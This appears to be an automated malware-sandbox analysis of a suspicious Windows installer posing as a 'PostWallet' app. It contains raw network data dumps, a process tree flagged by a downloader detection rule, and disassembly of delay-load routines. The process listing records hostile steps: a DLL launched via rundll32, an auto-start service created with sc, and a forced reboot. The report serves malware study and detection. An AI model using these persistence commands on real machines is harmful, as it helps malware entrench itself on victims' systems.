                                        Content-Type: application/zip
                                        Server: AmazonS3
                                        Content-Length: 7426462
                                        Connection: close
                                        2024-03-07 09:36:08 UTC16384INData Raw: 48 7e 88 45 61 e7 06 6b 79 4a 63 ad ab 62 f6 47 df 51 a6 08 0e 41 0f df 94 63 8a 7b 0e 41 74 98 e5 8c 1e 65 42 5f 42 8b 2f 36 7b b2 c9 bd 02 97 01 97 bb da c9 1a 37 dc c8 ab 77 a5 0f 8b 86 d4 ff 03 d9 48 a8 dd 50 ca a2 c8 15 00 4d 0c 3a 13 82 24 74 7e 2f 5d c7 3f a9 fa 9d da 25 00 98 c7 6b b9 75 4c ef 85 3c f0 5f 4d 4e d2 38 35 78 7b 55 6b a4 3c 5a b6 a1 e8 b8 f7 fc dd 3f 4e 2d de af df bc e0 85 84 4f 95 21 28 c1 2c 44 80 f0 01 a5 d6 1f b2 9c 29 52 c2 67 b2 94 7e 1a ae 56 22 d5 3e 3f 53 98 cd ec b2 ae 26 0d 4f 85 c6 c1 16 e3 e3 57 71 c0 7b ec 71 7c f8 f3 85 03 e6 bf 4e b2 c7 a7 70 7a 3f 63 89 42 1c 48 d1 94 66 e5 be c9 ce 91 fc 3a 9f 1d 89 26 54 3e 81 fe 04 38 c5 6b db 69 7a 32 dc 09 b0 11 0f 44 02 8b 71 6e 17 bd 2c ab 91 22 26 f5 27 e2 6a 53 6d 4c 8e 99
                                        Data Ascii: H~EakyJcbGQAc{AteB_B/6{7wHPM:$t~/]?%kuL<_MN85x{Uk<Z?N-O!(,D)Rg~V">?S&OWq{q|Npz?cBHf:&T>8kiz2Dqn,"&'jSmL
                                        2024-03-07 09:36:08 UTC601INData Raw: d0 ed 84 63 ec 7c 34 07 d4 66 57 9e a4 f1 02 e6 c3 74 84 84 f0 0c b1 b5 ff e5 28 5a 80 69 03 4c b9 0e 42 49 46 16 1d ab fe 52 a9 13 98 89 ca f1 98 f6 d6 8e 89 63 51 9e d1 2a be e1 69 b1 f0 e7 9f 66 a7 53 63 31 a3 ff 32 13 23 72 6f c9 7a fa 24 d7 97 83 96 9e f3 39 e2 44 43 f1 dc e5 32 45 81 78 5b 31 6d d8 09 7a 45 ba 81 2a 3e 08 4d ae ea 70 72 a1 06 bc 88 d8 d7 85 de c6 73 33 e0 b9 c4 11 61 5b 97 b6 97 42 b4 41 9a 4e 25 ba b6 e1 1f 9b f1 ab 14 e6 8f 1d 3c 27 91 af b1 23 00 03 13 ea cf 0a 73 dd 0f 4c c6 a3 5b 60 b9 c1 53 78 f0 37 34 ef 8d e0 d7 bf a9 57 b5 2a 66 e2 6a 38 4c 02 9d 25 be aa 4d bc d3 e2 f2 6e b9 5f c4 46 4d c3 29 6c ec 1b 58 73 0c 04 79 a1 3b 36 f2 9d f8 5b 59 0a f8 2a cf 82 a1 8d 63 99 1d 52 a0 83 3e 9c 7a 8d d7 49 d6 99 aa 7b 6c a8 4b 4c 2d
                                        Data Ascii: c|4fWt(ZiLBIFRcQ*ifSc12#roz$9DC2Ex[1mzE*>Mprs3a[BAN%<'#sL[`Sx74W*fj8L%Mn_FM)lXsy;6[Y*cR>zI{lKL-
                                        2024-03-07 09:36:08 UTC15269INData Raw: 08 ed df 9f 8e ee 33 fd f6 4f c4 a5 dd 2c d3 5e 02 b6 b1 c0 34 a5 07 1b e7 f6 b0 29 0a ab 60 53 80 1d 59 16 bf d2 17 89 3c 1b 65 60 be 30 f3 da 8b 9c e4 69 30 da 3e b6 b2 a5 3f f6 11 80 cb 3a 3e 1f cf f0 9d b6 cb b1 f3 02 64 43 c8 f9 44 70 0a ef c3 ce af 59 71 b7 3c 6e 96 94 72 73 66 af e7 82 29 50 5d a4 17 04 98 bc 3e ad a1 1a cb e3 9b 40 b6 bc ac fe b6 f5 50 4b 8f 0d 49 5b d1 91 40 fb 15 c5 fa 5f e2 84 dd 7f b8 d1 76 56 0e b5 ce b4 e6 c6 84 66 ee 5f 46 0c 0d f5 9f 49 2c b2 a9 00 4d 0b 4c 0f 0b a5 a5 48 83 41 c1 b6 37 1d 46 cd af 6f 87 5b d0 a8 04 b4 0c be 14 41 c0 0b d6 9f 74 2d 2f d3 99 dd 97 d5 9b f8 ed 50 4d 9a f1 64 7c 57 fd 76 a7 6a b4 38 eb d5 ab a2 6a c0 61 45 13 7b 7b 3e d1 18 20 f4 2a 07 9b 65 eb e8 4c dc 14 5c e0 1f b2 30 dc 60 4c 24 10 60 ef
                                        Data Ascii: 3O,^4)`SY<e`0i0>?:>dCDpYq<nrsf)P]>@PKI[@_vVf_FI,MLHA7Fo[At-/PMd|Wvj8jaE{{> *eL\0`L$`
                                        2024-03-07 09:36:09 UTC16384INData Raw: 50 b6 e9 87 a0 59 b0 f9 e1 71 f8 31 f5 c1 4c 38 95 71 87 f6 a4 c6 bd 47 d3 bb 38 fd 3a 1b 29 37 51 18 60 73 04 27 22 37 75 c6 96 7f a5 7c ab 25 88 4a b7 9a fb 7c 25 ef 40 3e ac 15 41 eb ea 0f 6d e6 b9 35 05 e0 fb 46 c8 85 2e b7 50 95 a5 d4 c4 cc 1a 57 21 a5 69 58 d0 e5 33 03 a1 6d 9b bf 25 3f a2 ab 8d 63 b2 ce 49 f1 1a e2 9c 6e 38 cc ef be 62 8b bb d4 7a 5b f8 cb 6b f7 0f 13 e5 91 2a 26 7d 02 85 88 f8 6e 43 7c ae 13 cb eb 16 9f ba 2b e6 b5 bf 97 b9 0f 8e cb 77 01 5f b2 03 67 51 c9 9c ed 77 d8 29 c1 26 13 a5 5e 2f 9f b0 30 0e bb 36 7e 85 3c 20 2c 24 e9 6b 37 0e de 0c 4e 50 eb a4 7f 3f 0c 8e 95 8f d7 57 30 03 62 0d a1 84 cf 04 b2 a4 b5 4e 98 26 34 97 73 6c d3 0f d1 a0 b7 bc a7 43 78 fa 18 0f 65 93 ee cd 61 c5 b1 19 35 d1 68 ef 8b ee 4b 82 6e a9 6a e6 90 5d
                                        Data Ascii: PYq1L8qG8:)7Q`s'"7u|%J|%@>Am5F.PW!iX3m%?cIn8bz[k*&}nC|+w_gQw)&^/06~< ,$k7NP?W0bN&4slCxea5hKnj]
                                        2024-03-07 09:36:09 UTC1024INData Raw: 12 dd db 7b 39 1c b0 db 5d bd 71 68 de 7d 3e 78 96 25 09 94 04 57 92 64 52 3b a3 b4 cd 12 4a 06 c9 9b d8 56 c2 b4 5f cc 19 24 35 cf 9d ca a5 46 c8 09 9f dc 55 7a 09 25 4f 84 ba ab 20 6f 55 a0 f4 68 26 ff ac 33 d9 9e 7c 5b c1 f7 4c 07 0a 2f 14 06 a9 ba 13 c0 4e 4f 38 ec 58 58 d6 3c 8e a1 b7 45 36 c8 20 c6 d8 01 91 be 31 ff c6 b6 10 08 86 bb 36 87 47 a1 19 bd 7f 71 50 21 3f fa 94 06 5f f4 3a 79 b2 c3 eb e2 ad 27 5e 09 ad 29 27 9b cc 36 3e 35 f9 25 e0 08 bb 3d 9e 7d 83 7c e5 5a 34 68 43 5f 37 46 63 2f e4 df 16 18 d3 c0 6b f9 ce 51 22 7a bf 74 34 03 8e 4d ff 21 ab 59 dc 2b 84 d1 4d 96 d1 53 55 cb d3 7d 8d 3b 6b af 37 24 3b 75 55 22 14 df 4f 76 32 eb 01 e2 de a6 9c d4 53 dc 7a 37 5a c3 c9 f3 eb 00 34 68 cf af 0c 4a ec 1b 72 06 1b 2c 81 2a 83 d2 d6 2c bf 69 41
                                        Data Ascii: {9]qh}>x%WdR;JV_$5FUz%O oUh&3|[L/NO8XX<E6 16GqP!?_:y'^)'6>5%=}|Z4hC_7Fc/kQ"zt4M!Y+MSU};k7$;uU"Ov2Sz7Z4hJr,*,iA
                                        2024-03-07 09:36:09 UTC16384INData Raw: eb aa 7c 58 3e 40 ca 91 1f 34 1b 91 69 76 15 9b c5 b0 59 64 ee 1e ae bf c0 81 fc 50 b1 f7 a5 d3 68 83 53 cc b8 00 62 83 19 67 cd e3 8a 4e 76 94 f2 c2 b3 8d a8 03 4b 22 4a 08 9d 9c 98 ee 64 f7 ac d6 de 6c 50 58 f4 67 07 1c 03 d8 40 77 7b a0 b7 57 eb 16 6d 57 b1 5a 34 27 2d 5b a9 ab 47 7c 7c ca 9c d2 12 38 9a 8c ef be c0 fe 38 ef 06 88 16 5d 23 b6 cd 9a fb e6 7d 36 61 a2 ea b5 84 2c 3a 79 6e fb f0 d0 69 a4 87 6e 7f 96 f0 e0 5a d6 bf 49 85 f2 b2 92 b0 70 ff f3 d5 9d 87 9c df 33 e0 f4 2b f1 e3 d0 96 06 ac 0b f0 6c bc 9e d3 cb a3 7a 14 8a 95 df 29 c0 06 8a 51 2c 91 cc 69 f8 c6 4c b9 59 93 a8 7e 95 1d 73 3f 87 90 08 ec 52 84 cd 3b b9 dd a3 f9 46 a0 e5 84 e1 fc 8e f1 22 c9 04 db 7d 00 ac c7 c9 2f fd 01 13 18 54 9d c9 53 53 1b a3 e9 ed 34 61 30 6d 27 15 aa c6 12
                                        Data Ascii: |X>@4ivYdPhSbgNvK"JdlPXg@w{WmWZ4'-[G||88]#}6a,:yninZIp3+lz)Q,iLY~s?R;F"}/TSS4a0m'
                                        2024-03-07 09:36:09 UTC1024INData Raw: ed 12 47 f1 d9 1a 9d 81 98 5f e9 e9 6c 71 89 f9 61 81 b4 93 ce 46 d3 e3 68 1f 0f 5c a7 27 f1 2c fc 86 f2 d8 7f aa db 56 f7 1c e2 4b 1e 9e 94 4e 35 4d 55 54 e6 cf ef 98 b6 00 43 f4 33 87 73 22 32 f6 83 05 e0 d0 1d 9a fa 77 f2 e0 61 7c 25 79 46 b2 99 39 c7 ff f1 c9 90 7a 04 aa 7b f4 97 c0 fe a5 22 01 a8 91 ef c6 8e 35 93 ee 32 a8 ce 77 76 41 6e d8 bf 10 75 25 5e d1 ff 23 6b 95 8c 64 8c f4 ec 46 a6 0d a6 bd 7e 29 91 9a b4 c1 a5 bb 2e 93 20 0c bc cc 58 7e 94 88 7d 31 5a 63 a6 14 c7 9f 34 6b e8 92 3d 21 d2 c8 47 27 4e 0b 75 09 5d 1c 7e 1c 07 32 a5 43 1e aa 1a 64 e1 df 9e 72 f3 01 79 05 2b 15 1f 10 4d 94 ee 32 da 24 f7 d7 fb 63 34 7a 60 0c 65 1a b7 c4 aa 26 e8 ae 79 4b b9 e4 22 db 8f 6e 9a 99 84 80 48 8d d3 a9 11 79 ff 8a 51 da 8c 1e 74 81 96 a2 90 b9 40 3e aa
                                        Data Ascii: G_lqaFh\',VKN5MUTC3s"2wa|%yF9z{"52wvAnu%^#kdF~). X~}1Zc4k=!G'Nu]~2Cdry+M2$c4z`e&yK"nHyQt@>
                                        2024-03-07 09:36:09 UTC16384INData Raw: 26 1c fb 24 0c 9b 8a ce 99 25 ca ee 2d b0 fe d2 2d cc 29 5d a5 ef 6f 56 52 91 14 df e6 01 00 d0 f7 53 ea 80 c8 5b 55 23 20 44 fd 4f cd 07 17 90 fe 4b 10 16 e6 72 21 47 53 1c b2 57 92 1e c0 15 6d 2e 28 73 f4 83 f4 02 66 c9 3c 58 00 bb d4 79 50 cb 9b 16 2f 21 d6 c9 29 9e d1 8f 12 c5 0c 22 be e0 67 a1 72 32 81 e9 0c 99 f0 62 f4 52 f9 23 30 ec 71 3b 05 53 af c0 9c b2 22 4f 64 f5 cd c2 00 1b 96 3b a3 c6 79 82 c4 10 60 91 c1 82 d8 bd 51 96 fa b2 7c 31 3e c0 46 9b 51 ec 0e 01 d5 02 79 91 ad 69 78 56 3d 1f 9a ef 0d da 59 5d e1 3d 1a 5f 23 f9 59 cf fd 44 8d 3b 98 46 b5 b2 ae 75 4c 59 8a ce d2 cc 51 ad 67 c3 b8 ba 93 b9 c5 d5 d2 0d 54 4d 5e 76 17 d9 71 c0 28 6d dc f5 31 c3 47 06 05 70 c7 1c 5a 54 a0 eb 9e 0f a7 fd f8 af 35 41 f1 d7 7b 9e fa 4d 9e 3a b8 a7 67 97 d2
                                        Data Ascii: &$%--)]oVRS[U# DOKr!GSWm.(sf<XyP/!)"gr2bR#0q;S"Od;y`Q|1>FQyixV=Y]=_#YD;FuLYQgTM^vq(m1GpZT5A{M:g
                                        2024-03-07 09:36:09 UTC1024INData Raw: 9c ee de 9d c3 a6 49 35 30 55 f5 64 d7 5c 93 f4 84 21 8a 91 e2 f4 94 21 16 d8 71 d3 62 92 9d bd 1e ee f5 33 d1 0e 0f 97 8e 0e 10 a4 76 9a 7e 1e 0c bd 88 65 23 36 cb 85 81 10 ba fe d3 d8 b6 5b 48 fb 41 e1 d4 bb b8 99 45 56 a3 36 6d 58 cb 5b bf 2c 0f 45 6a 54 90 9d 6e ca 93 c4 7e e3 92 7b 1b 8b 63 9e a1 0c 62 f0 6e c2 90 1f c2 18 3d c8 5a 3d 93 5e 04 82 ef d2 61 de 50 56 8c 40 19 0a 3c 46 39 23 49 c6 29 3b aa a9 88 3c 95 89 e4 ba 8c f2 b1 3b 86 33 0b 20 eb 04 50 c5 02 72 bb df 65 c4 50 dc 92 a1 a4 80 a3 54 70 63 6e eb 12 08 14 49 c7 05 89 18 e8 bd 48 d5 ec 8d 43 de 6c 11 cf bc 07 6f 9d b4 95 ed 9f df c7 24 ff fc f0 45 88 45 08 70 90 f4 ee 69 dc eb b9 b4 4b cc 88 e0 2c 0d 2e 98 6e 9f 25 60 98 f7 a0 ce 4d ac 9e b0 a8 4d db dc b2 68 8b 93 0a ef 5c 78 80 a9 15
                                        Data Ascii: I50Ud\!!qb3v~e#6[HAEV6mX[,EjTn~{cbn=Z=^aPV@<F9#I);<;3 PrePTpcnIHClo$EEpiK,.n%`MMh\x
                                        2024-03-07 09:36:09 UTC16384INData Raw: 08 16 00 db 9d aa 8a 76 7b e6 53 e5 61 9b 99 47 2b cc bd 08 5e 7b 17 b9 9c 54 94 8e b4 49 38 e8 98 f2 b2 60 4e 97 d4 74 d5 66 f8 51 07 a1 e4 04 e2 a2 e6 af 5b af f7 00 db 50 df 20 19 84 ce 6e 01 31 32 17 87 77 58 17 10 9b 5b 4b 71 b9 92 4e f2 4f 8a 0e 34 17 f4 86 51 fc a9 a4 34 9c 9d 41 68 e1 7e 6f df 28 4b d6 a4 f5 69 1c 53 ae fe 68 5d e4 86 77 c1 7c e6 ed f0 de 9e f6 db 72 b8 3e 30 0a 7d 3e ab 75 11 bf d8 e2 51 fe 99 6c d4 6f 1e 35 d6 4f 3c e8 de 2c a2 98 29 3e 0a 8d 7e 72 0d 3d e6 53 52 b6 61 29 61 8f 0b 7b e6 05 e3 3f 38 c7 2c 7d 22 15 8e 02 9d db ee 0b 90 31 3c 68 8d 05 2b a7 fe 1d e0 86 71 4c 8c 9a 10 de 81 87 8c bc 26 d2 43 52 a6 6e e0 4f 7e ec 31 5e 73 63 5e 18 53 0c 4a 59 12 aa fc 80 6e 41 d6 c1 f0 76 39 0c 18 1a 92 4e d2 3c 58 16 0b 2b ca 0e 16
                                        Data Ascii: v{SaG+^{TI8`NtfQ[P n12wX[KqNO4Q4Ah~o(KiSh]w|r>0}>uQlo5O<,)>~r=SRa)a{?8,}"1<h+qL&CRnO~1^sc^SJYnAv9N<X+


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:10:35:57
                                        Start date:07/03/2024
                                        Path:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        Imagebase:0x610000
                                        File size:6'569'472 bytes
                                        MD5 hash:9E1E30202D950CE1F273EB2E8492F39B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:10:35:57
                                        Start date:07/03/2024
                                        Path:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC
                                        Imagebase:0x610000
                                        File size:6'569'472 bytes
                                        MD5 hash:9E1E30202D950CE1F273EB2E8492F39B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:10:35:58
                                        Start date:07/03/2024
                                        Path:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
                                        Imagebase:0x2a0000
                                        File size:1'899'520 bytes
                                        MD5 hash:A560BAD9E373EA5223792D60BEDE2B13
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:10:36:00
                                        Start date:07/03/2024
                                        Path:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun
                                        Imagebase:0x340000
                                        File size:89'392 bytes
                                        MD5 hash:436CEDFA08F245AD52DD221BEC4480A4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:4
                                        Start time:10:36:00
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:7
                                        Start time:10:36:02
                                        Start date:07/03/2024
                                        Path:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe"
                                        Imagebase:0x340000
                                        File size:89'392 bytes
                                        MD5 hash:436CEDFA08F245AD52DD221BEC4480A4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:8
                                        Start time:10:36:02
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:9
                                        Start time:10:36:04
                                        Start date:07/03/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:10
                                        Start time:10:36:04
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:11
                                        Start time:10:36:04
                                        Start date:07/03/2024
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                        Imagebase:0xc60000
                                        File size:61'440 bytes
                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:12
                                        Start time:10:36:05
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):false
                                        Commandline:rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                        Imagebase:0x7ff73bda0000
                                        File size:71'680 bytes
                                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:15
                                        Start time:10:36:16
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
                                        Imagebase:0x7ff619640000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:10:36:16
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:10:36:16
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\shutdown.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                                        Imagebase:0x7ff6fbe80000
                                        File size:28'160 bytes
                                        MD5 hash:F2A4E18DA72BB2C5B21076A5DE382A20
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:10:36:16
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
                                        Imagebase:0x7ff74b790000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:19
                                        Start time:10:36:17
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:21
                                        Start time:10:36:25
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:11%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:6.4%
                                          Total number of Nodes:78
                                          Total number of Limit Nodes:2
                                          execution_graph 316 619d21 317 619d2b 316->317 318 61a090 ___delayLoadHelper2@8 14 API calls 317->318 319 619d38 318->319 320 619cd1 321 619c8e 320->321 321->320 322 61a090 ___delayLoadHelper2@8 14 API calls 321->322 322->321 323 619cb3 325 619c8e 323->325 324 61a090 ___delayLoadHelper2@8 14 API calls 324->325 325->324 333 619c48 335 619c37 333->335 334 61a090 ___delayLoadHelper2@8 14 API calls 334->335 335->333 335->334 249 619cdb 251 619c8e 249->251 252 61a090 251->252 278 619df1 252->278 254 61a0a0 255 61a0fd 254->255 266 61a121 254->266 287 61a02e 255->287 258 61a199 LoadLibraryExA 259 61a1fa 258->259 260 61a1ac GetLastError 258->260 262 61a205 FreeLibrary 259->262 263 61a20c 259->263 264 61a1d5 260->264 271 61a1bf 260->271 261 61a2c8 270 61a02e DloadReleaseSectionWriteAccess 6 API calls 261->270 262->263 263->261 265 61a26a GetProcAddress 263->265 268 61a02e DloadReleaseSectionWriteAccess 6 API calls 264->268 265->261 267 61a27a GetLastError 265->267 266->258 266->259 266->261 266->263 274 61a28d 267->274 269 61a1e0 RaiseException 268->269 272 61a2f6 269->272 270->272 271->259 271->264 272->251 273 61a02e DloadReleaseSectionWriteAccess 6 API calls 275 61a2ae RaiseException 273->275 274->261 274->273 276 619df1 DloadAcquireSectionWriteAccess 6 API calls 275->276 277 61a2c5 276->277 277->261 279 619e23 278->279 280 619dfd 278->280 279->254 295 619e97 280->295 283 619e1e 303 619e24 283->303 288 61a040 287->288 289 61a062 RaiseException 287->289 290 619e97 DloadReleaseSectionWriteAccess 3 API calls 288->290 289->272 291 61a045 290->291 292 61a05d 291->292 293 619fc0 DloadProtectSection 3 API calls 291->293 313 61a064 292->313 293->292 296 619e24 DloadGetSRWLockFunctionPointers 3 API calls 295->296 297 619e02 296->297 297->283 298 619fc0 297->298 301 619fd5 DloadObtainSection 298->301 299 619fdb 299->283 300 61a010 VirtualProtect 300->299 301->299 301->300 309 619ed6 VirtualQuery 301->309 304 619e32 303->304 305 619e47 303->305 304->305 306 619e36 GetModuleHandleW 304->306 305->254 306->305 307 619e4b GetProcAddress 306->307 307->305 308 619e5b GetProcAddress 307->308 308->305 310 619ef1 309->310 311 619f33 310->311 312 619efc GetSystemInfo 310->312 311->300 312->311 314 619e24 DloadGetSRWLockFunctionPointers 3 API calls 313->314 315 61a069 314->315 315->289 336 619c2d 337 619c37 336->337 338 61a090 ___delayLoadHelper2@8 14 API calls 337->338 338->337 342 61ab5c 345 61b0b8 342->345 344 61ab61 344->344 346 61b0ce 345->346 348 61b0d7 346->348 349 61b06b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 346->349 348->344 349->348

                                          Callgraph

                                          Executed Functions

                                          Function 00619CD1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 10 619cd1-619cd6 11 619c8e-619c96 call 61a090 10->11 13 619c9b-619c9c 11->13 13->10
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00619C96
                                            • Part of subcall function 0061A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0061A09B
                                            • Part of subcall function 0061A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0061A103
                                            • Part of subcall function 0061A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0061A114
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1627785191.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                          • Associated: 00000000.00000002.1627722929.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627820635.000000000062F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627845730.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627871097.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_610000_00023948209303294#U00ac320302282349843984903.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID:
                                          • API String ID: 697777088-0
                                          • Opcode ID: 68a135996024c522ad13601e332b6c03b7ea60be0855c8810f6ef106f45fb115
                                          • Instruction ID: 27b9e18664b1459668466885012544582a657e9570b51e17757a9b7d10ede232
                                          • Opcode Fuzzy Hash: 68a135996024c522ad13601e332b6c03b7ea60be0855c8810f6ef106f45fb115
                                          • Instruction Fuzzy Hash: 7EB012E135D2006E3158E5955F02DF6024FD1C4B21734442EF044C6040D8401CC220B7
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00619CB3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
